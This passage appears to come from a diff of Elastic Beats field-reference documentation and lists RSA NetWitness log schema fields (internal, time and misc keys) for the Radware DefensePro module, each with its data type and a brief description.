log files + + + +*`rabbitmq.log.pid`*:: ++ +-- +The Erlang process id + +type: keyword + +example: <0.222.0> + +-- + +[[exported-fields-radware]] +== Radware DefensePro fields + +radware fields. + + + +*`network.interface.name`*:: ++ +-- +Name of the network interface where the traffic has been observed. + + +type: keyword + +-- + + + +*`rsa.internal.msg`*:: ++ +-- +This key is used to capture the raw message that comes into the Log Decoder + +type: keyword + +-- + +*`rsa.internal.messageid`*:: ++ +-- +type: keyword + +-- + +*`rsa.internal.event_desc`*:: ++ +-- +type: keyword + +-- + +*`rsa.internal.message`*:: ++ +-- +This key captures the contents of instant messages + +type: keyword + +-- + +*`rsa.internal.time`*:: ++ +-- +This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. + +type: date + +-- + +*`rsa.internal.level`*:: ++ +-- +Deprecated key defined only in table map. + +type: long + +-- + +*`rsa.internal.msg_id`*:: ++ +-- +This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.msg_vid`*:: ++ +-- +This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.data`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.obj_server`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.obj_val`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.resource`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.obj_id`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.statement`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.audit_class`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.entry`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.hcode`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.inode`*:: ++ +-- +Deprecated key defined only in table map. + +type: long + +-- + +*`rsa.internal.resource_class`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.dead`*:: ++ +-- +Deprecated key defined only in table map. + +type: long + +-- + +*`rsa.internal.feed_desc`*:: ++ +-- +This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.feed_name`*:: ++ +-- +This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.cid`*:: ++ +-- +This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_class`*:: ++ +-- +This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_group`*:: ++ +-- +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_host`*:: ++ +-- +This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_ip`*:: ++ +-- +This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip + +-- + +*`rsa.internal.device_ipv6`*:: ++ +-- +This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip + +-- + +*`rsa.internal.device_type`*:: ++ +-- +This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.device_type_id`*:: ++ +-- +Deprecated key defined only in table map. + +type: long + +-- + +*`rsa.internal.did`*:: ++ +-- +This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.entropy_req`*:: ++ +-- +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration + +type: long + +-- + +*`rsa.internal.entropy_res`*:: ++ +-- +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration + +type: long + +-- + +*`rsa.internal.event_name`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.feed_category`*:: ++ +-- +This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.forward_ip`*:: ++ +-- +This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. + +type: ip + +-- + +*`rsa.internal.forward_ipv6`*:: ++ +-- +This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip + +-- + +*`rsa.internal.header_id`*:: ++ +-- +This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.lc_cid`*:: ++ +-- +This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.lc_ctime`*:: ++ +-- +This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: date + +-- + +*`rsa.internal.mcb_req`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most + +type: long + +-- + +*`rsa.internal.mcb_res`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most + +type: long + +-- + +*`rsa.internal.mcbc_req`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams + +type: long + +-- + +*`rsa.internal.mcbc_res`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams + +type: long + +-- + +*`rsa.internal.medium`*:: ++ +-- +This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session + +type: long + +-- + +*`rsa.internal.node_name`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.nwe_callback_id`*:: ++ +-- +This key denotes that event is endpoint related + +type: keyword + +-- + +*`rsa.internal.parse_error`*:: ++ +-- +This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.payload_req`*:: ++ +-- +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep + +type: long + +-- + +*`rsa.internal.payload_res`*:: ++ +-- +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep + +type: long + +-- + +*`rsa.internal.process_vid_dst`*:: ++ +-- +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. + +type: keyword + +-- + +*`rsa.internal.process_vid_src`*:: ++ +-- +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. + +type: keyword + +-- + +*`rsa.internal.rid`*:: ++ +-- +This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: long + +-- + +*`rsa.internal.session_split`*:: ++ +-- +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.site`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.size`*:: ++ +-- +This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: long + +-- + +*`rsa.internal.sourcefile`*:: ++ +-- +This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.ubc_req`*:: ++ +-- +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once + +type: long + +-- + +*`rsa.internal.ubc_res`*:: ++ +-- +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once + +type: long + +-- + +*`rsa.internal.word`*:: ++ +-- +This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log + +type: keyword + +-- + + +*`rsa.time.event_time`*:: ++ +-- +This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form + +type: date + +-- + +*`rsa.time.duration_time`*:: ++ +-- +This key is used to capture the normalized duration/lifetime in seconds. + +type: double + +-- + +*`rsa.time.event_time_str`*:: ++ +-- +This key is used to capture the incomplete time mentioned in a session as a string + +type: keyword + +-- + +*`rsa.time.starttime`*:: ++ +-- +This key is used to capture the Start time mentioned in a session in a standard form + +type: date + +-- + +*`rsa.time.month`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.day`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.endtime`*:: ++ +-- +This key is used to capture the End time mentioned in a session in a standard form + +type: date + +-- + +*`rsa.time.timezone`*:: ++ +-- +This key is used to capture the timezone of the Event Time + +type: keyword + +-- + +*`rsa.time.duration_str`*:: ++ +-- +A text string version of the duration + +type: keyword + +-- + +*`rsa.time.date`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.year`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.recorded_time`*:: ++ +-- +The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. + +type: date + +-- + +*`rsa.time.datetime`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.effective_time`*:: ++ +-- +This key is the effective time referenced by an individual event in a Standard Timestamp format + +type: date + +-- + +*`rsa.time.expire_time`*:: ++ +-- +This key is the timestamp that explicitly refers to an expiration. + +type: date + +-- + +*`rsa.time.process_time`*:: ++ +-- +Deprecated, use duration.time + +type: keyword + +-- + +*`rsa.time.hour`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.min`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.timestamp`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.event_queue_time`*:: ++ +-- +This key is the Time that the event was queued. + +type: date + +-- + +*`rsa.time.p_time1`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.tzone`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.eventtime`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.gmtdate`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.gmttime`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_date`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_month`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_time`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_time2`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_year`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.expire_time_str`*:: ++ +-- +This key is used to capture incomplete timestamp that explicitly refers to an expiration. + +type: keyword + +-- + +*`rsa.time.stamp`*:: ++ +-- +Deprecated key defined only in table map. + +type: date + +-- + + +*`rsa.misc.action`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.result`*:: ++ +-- +This key is used to capture the outcome/result string value of an action in a session. + +type: keyword + +-- + +*`rsa.misc.severity`*:: ++ +-- +This key is used to capture the severity given the session + +type: keyword + +-- + +*`rsa.misc.event_type`*:: ++ +-- +This key captures the event category type as specified by the event source. + +type: keyword + +-- + +*`rsa.misc.reference_id`*:: ++ +-- +This key is used to capture an event id from the session directly + +type: keyword + +-- + +*`rsa.misc.version`*:: ++ +-- +This key captures Version of the application or OS which is generating the event. + +type: keyword + +-- + +*`rsa.misc.disposition`*:: ++ +-- +This key captures the The end state of an action. + +type: keyword + +-- + +*`rsa.misc.result_code`*:: ++ +-- +This key is used to capture the outcome/result numeric value of an action in a session + +type: keyword + +-- + +*`rsa.misc.category`*:: ++ +-- +This key is used to capture the category of an event given by the vendor in the session + +type: keyword + +-- + +*`rsa.misc.obj_name`*:: ++ +-- +This is used to capture name of object + +type: keyword + +-- + +*`rsa.misc.obj_type`*:: ++ +-- +This is used to capture type of object + +type: keyword + +-- + +*`rsa.misc.event_source`*:: ++ +-- +This key captures Source of the event that’s not a hostname + +type: keyword + +-- + +*`rsa.misc.log_session_id`*:: ++ +-- +This key is used to capture a sessionid from the session directly + +type: keyword + +-- + +*`rsa.misc.group`*:: ++ +-- +This key captures the Group Name value + +type: keyword + +-- + +*`rsa.misc.policy_name`*:: ++ +-- +This key is used to capture the Policy Name only. + +type: keyword + +-- + +*`rsa.misc.rule_name`*:: ++ +-- +This key captures the Rule Name + +type: keyword + +-- + +*`rsa.misc.context`*:: ++ +-- +This key captures Information which adds additional context to the event. + +type: keyword + +-- + +*`rsa.misc.change_new`*:: ++ +-- +This key is used to capture the new values of the attribute that’s changing in a session + +type: keyword + +-- + +*`rsa.misc.space`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.client`*:: ++ +-- +This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. + +type: keyword + +-- + +*`rsa.misc.msgIdPart1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.msgIdPart2`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.change_old`*:: ++ +-- +This key is used to capture the old value of the attribute that’s changing in a session + +type: keyword + +-- + +*`rsa.misc.operation_id`*:: ++ +-- +An alert number or operation number. The values should be unique and non-repeating. + +type: keyword + +-- + +*`rsa.misc.event_state`*:: ++ +-- +This key captures the current state of the object/item referenced within the event. Describing an on-going event. + +type: keyword + +-- + +*`rsa.misc.group_object`*:: ++ +-- +This key captures a collection/grouping of entities. Specific usage + +type: keyword + +-- + +*`rsa.misc.node`*:: ++ +-- +Common use case is the node name within a cluster. The cluster name is reflected by the host name. + +type: keyword + +-- + +*`rsa.misc.rule`*:: ++ +-- +This key captures the Rule number + +type: keyword + +-- + +*`rsa.misc.device_name`*:: ++ +-- +This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc + +type: keyword + +-- + +*`rsa.misc.param`*:: ++ +-- +This key is the parameters passed as part of a command or application, etc. + +type: keyword + +-- + +*`rsa.misc.change_attrib`*:: ++ +-- +This key is used to capture the name of the attribute that’s changing in a session + +type: keyword + +-- + +*`rsa.misc.event_computer`*:: ++ +-- +This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. + +type: keyword + +-- + +*`rsa.misc.reference_id1`*:: ++ +-- +This key is for Linked ID to be used as an addition to "reference.id" + +type: keyword + +-- + +*`rsa.misc.event_log`*:: ++ +-- +This key captures the Name of the event log + +type: keyword + +-- + +*`rsa.misc.OS`*:: ++ +-- +This key captures the Name of the Operating System + +type: keyword + +-- + +*`rsa.misc.terminal`*:: ++ +-- +This key captures the Terminal Names only + +type: keyword + +-- + +*`rsa.misc.msgIdPart3`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.filter`*:: ++ +-- +This key captures Filter used to reduce result set + +type: keyword + +-- + +*`rsa.misc.serial_number`*:: ++ +-- +This key is the Serial number associated with a physical asset. + +type: keyword + +-- + +*`rsa.misc.checksum`*:: ++ +-- +This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. + +type: keyword + +-- + +*`rsa.misc.event_user`*:: ++ +-- +This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. + +type: keyword + +-- + +*`rsa.misc.virusname`*:: ++ +-- +This key captures the name of the virus + +type: keyword + +-- + +*`rsa.misc.content_type`*:: ++ +-- +This key is used to capture Content Type only. + +type: keyword + +-- + +*`rsa.misc.group_id`*:: ++ +-- +This key captures Group ID Number (related to the group name) + +type: keyword + +-- + +*`rsa.misc.policy_id`*:: ++ +-- +This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise + +type: keyword + +-- + +*`rsa.misc.vsys`*:: ++ +-- +This key captures Virtual System Name + +type: keyword + +-- + +*`rsa.misc.connection_id`*:: ++ +-- +This key captures the Connection ID + +type: keyword + +-- + +*`rsa.misc.reference_id2`*:: ++ +-- +This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. + +type: keyword + +-- + +*`rsa.misc.sensor`*:: ++ +-- +This key captures Name of the sensor. Typically used in IDS/IPS based devices + +type: keyword + +-- + +*`rsa.misc.sig_id`*:: ++ +-- +This key captures IDS/IPS Int Signature ID + +type: long + +-- + +*`rsa.misc.port_name`*:: ++ +-- +This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). + +type: keyword + +-- + +*`rsa.misc.rule_group`*:: ++ +-- +This key captures the Rule group name + +type: keyword + +-- + +*`rsa.misc.risk_num`*:: ++ +-- +This key captures a Numeric Risk value + +type: double + +-- + +*`rsa.misc.trigger_val`*:: ++ +-- +This key captures the Value of the trigger or threshold condition. + +type: keyword + +-- + +*`rsa.misc.log_session_id1`*:: ++ +-- +This key is used to capture a Linked (Related) Session ID from the session directly + +type: keyword + +-- + +*`rsa.misc.comp_version`*:: ++ +-- +This key captures the Version level of a sub-component of a product. + +type: keyword + +-- + +*`rsa.misc.content_version`*:: ++ +-- +This key captures Version level of a signature or database content. + +type: keyword + +-- + +*`rsa.misc.hardware_id`*:: ++ +-- +This key is used to capture unique identifier for a device or system (NOT a Mac address) + +type: keyword + +-- + +*`rsa.misc.risk`*:: ++ +-- +This key captures the non-numeric risk value + +type: keyword + +-- + +*`rsa.misc.event_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.reason`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.status`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.mail_id`*:: ++ +-- +This key is used to capture the mailbox id/name + +type: keyword + +-- + +*`rsa.misc.rule_uid`*:: ++ +-- +This key is the Unique Identifier for a rule. + +type: keyword + +-- + +*`rsa.misc.trigger_desc`*:: ++ +-- +This key captures the Description of the trigger or threshold condition. + +type: keyword + +-- + +*`rsa.misc.inout`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_msgid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.data_type`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.msgIdPart4`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.error`*:: ++ +-- +This key captures All non successful Error codes or responses + +type: keyword + +-- + +*`rsa.misc.index`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.listnum`*:: ++ +-- +This key is used to capture listname or listnumber, primarily for collecting access-list + +type: keyword + +-- + +*`rsa.misc.ntype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.observed_val`*:: ++ +-- +This key captures the Value observed (from the perspective of the device generating the log). + +type: keyword + +-- + +*`rsa.misc.policy_value`*:: ++ +-- +This key captures the contents of the policy. This contains details about the policy + +type: keyword + +-- + +*`rsa.misc.pool_name`*:: ++ +-- +This key captures the name of a resource pool + +type: keyword + +-- + +*`rsa.misc.rule_template`*:: ++ +-- +A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template + +type: keyword + +-- + +*`rsa.misc.count`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.number`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sigcat`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.type`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comments`*:: ++ +-- +Comment information provided in the log message + +type: keyword + +-- + +*`rsa.misc.doc_number`*:: ++ +-- +This key captures File Identification number + +type: long + +-- + +*`rsa.misc.expected_val`*:: ++ +-- +This key captures the Value expected (from the perspective of the device generating the log). + +type: keyword + +-- + +*`rsa.misc.job_num`*:: ++ +-- +This key captures the Job Number + +type: keyword + +-- + +*`rsa.misc.spi_dst`*:: ++ +-- +Destination SPI Index + +type: keyword + +-- + +*`rsa.misc.spi_src`*:: ++ +-- +Source SPI Index + +type: keyword + +-- + +*`rsa.misc.code`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.agent_id`*:: ++ +-- +This key is used to capture agent id + +type: keyword + +-- + +*`rsa.misc.message_body`*:: ++ +-- +This key captures the The contents of the message body. + +type: keyword + +-- + +*`rsa.misc.phone`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sig_id_str`*:: ++ +-- +This key captures a string object of the sigid variable. + +type: keyword + +-- + +*`rsa.misc.cmd`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.misc`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cpu`*:: ++ +-- +This key is the CPU time used in the execution of the event being recorded. + +type: long + +-- + +*`rsa.misc.event_desc`*:: ++ +-- +This key is used to capture a description of an event available directly or inferred + +type: keyword + +-- + +*`rsa.misc.sig_id1`*:: ++ +-- +This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id + +type: long + +-- + +*`rsa.misc.im_buddyid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_client`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_userid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.pid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.priority`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.context_subject`*:: ++ +-- +This key is to be used in an audit context where the subject is the object being identified + +type: keyword + +-- + +*`rsa.misc.context_target`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cve`*:: ++ +-- +This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. type: keyword @@ -112615,29883 +119850,31300 @@ type: keyword *`rsa.misc.fcatnum`*:: + -- -This key captures Filter Category Number. Legacy Usage +This key captures Filter Category Number. Legacy Usage + +type: keyword + +-- + +*`rsa.misc.library`*:: ++ +-- +This key is used to capture library information in mainframe devices + +type: keyword + +-- + +*`rsa.misc.parent_node`*:: ++ +-- +This key captures the Parent Node Name. Must be related to node variable. + +type: keyword + +-- + +*`rsa.misc.risk_info`*:: ++ +-- +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) + +type: keyword + +-- + +*`rsa.misc.tcp_flags`*:: ++ +-- +This key is captures the TCP flags set in any packet of session + +type: long + +-- + +*`rsa.misc.tos`*:: ++ +-- +This key describes the type of service + +type: long + +-- + +*`rsa.misc.vm_target`*:: ++ +-- +VMWare Target **VMWARE** only varaible. + +type: keyword + +-- + +*`rsa.misc.workspace`*:: ++ +-- +This key captures Workspace Description + +type: keyword + +-- + +*`rsa.misc.command`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.event_category`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.facilityname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.forensic_info`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.jobname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.mode`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.policy`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.policy_waiver`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.second`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.space1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.subcategory`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.tbdstr2`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.alert_id`*:: ++ +-- +Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) + +type: keyword + +-- + +*`rsa.misc.checksum_dst`*:: ++ +-- +This key is used to capture the checksum or hash of the the target entity such as a process or file. + +type: keyword + +-- + +*`rsa.misc.checksum_src`*:: ++ +-- +This key is used to capture the checksum or hash of the source entity such as a file or process. + +type: keyword + +-- + +*`rsa.misc.fresult`*:: ++ +-- +This key captures the Filter Result + +type: long + +-- + +*`rsa.misc.payload_dst`*:: ++ +-- +This key is used to capture destination payload + +type: keyword + +-- + +*`rsa.misc.payload_src`*:: ++ +-- +This key is used to capture source payload + +type: keyword + +-- + +*`rsa.misc.pool_id`*:: ++ +-- +This key captures the identifier (typically numeric field) of a resource pool + +type: keyword + +-- + +*`rsa.misc.process_id_val`*:: ++ +-- +This key is a failure key for Process ID when it is not an integer value + +type: keyword + +-- + +*`rsa.misc.risk_num_comm`*:: ++ +-- +This key captures Risk Number Community + +type: double + +-- + +*`rsa.misc.risk_num_next`*:: ++ +-- +This key captures Risk Number NextGen + +type: double + +-- + +*`rsa.misc.risk_num_sand`*:: ++ +-- +This key captures Risk Number SandBox + +type: double + +-- + +*`rsa.misc.risk_num_static`*:: ++ +-- +This key captures Risk Number Static + +type: double + +-- + +*`rsa.misc.risk_suspicious`*:: ++ +-- +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) + +type: keyword + +-- + +*`rsa.misc.risk_warning`*:: ++ +-- +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) + +type: keyword + +-- + +*`rsa.misc.snmp_oid`*:: ++ +-- +SNMP Object Identifier + +type: keyword + +-- + +*`rsa.misc.sql`*:: ++ +-- +This key captures the SQL query + +type: keyword + +-- + +*`rsa.misc.vuln_ref`*:: ++ +-- +This key captures the Vulnerability Reference details + +type: keyword + +-- + +*`rsa.misc.acl_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.acl_op`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.acl_pos`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.acl_table`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.admin`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.alarm_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.alarmname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.app_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.audit`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.audit_object`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.auditdata`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.benchmark`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.bypass`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cache`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cache_hit`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cefversion`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cfg_attr`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cfg_obj`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cfg_path`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.changes`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.client_ip`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.clustermembers`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_acttimeout`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_asn_src`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_bgpv4nxthop`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_ctr_dst_code`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_dst_tos`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_dst_vlan`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_engine_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_engine_type`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_f_switch`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_flowsampid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_flowsampintv`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_flowsampmode`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_inacttimeout`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_inpermbyts`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_inpermpckts`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_invalid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_ip_proto_ver`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_ipv4_ident`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_l_switch`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_log_did`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_log_rid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_max_ttl`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_maxpcktlen`*:: ++ +-- +type: 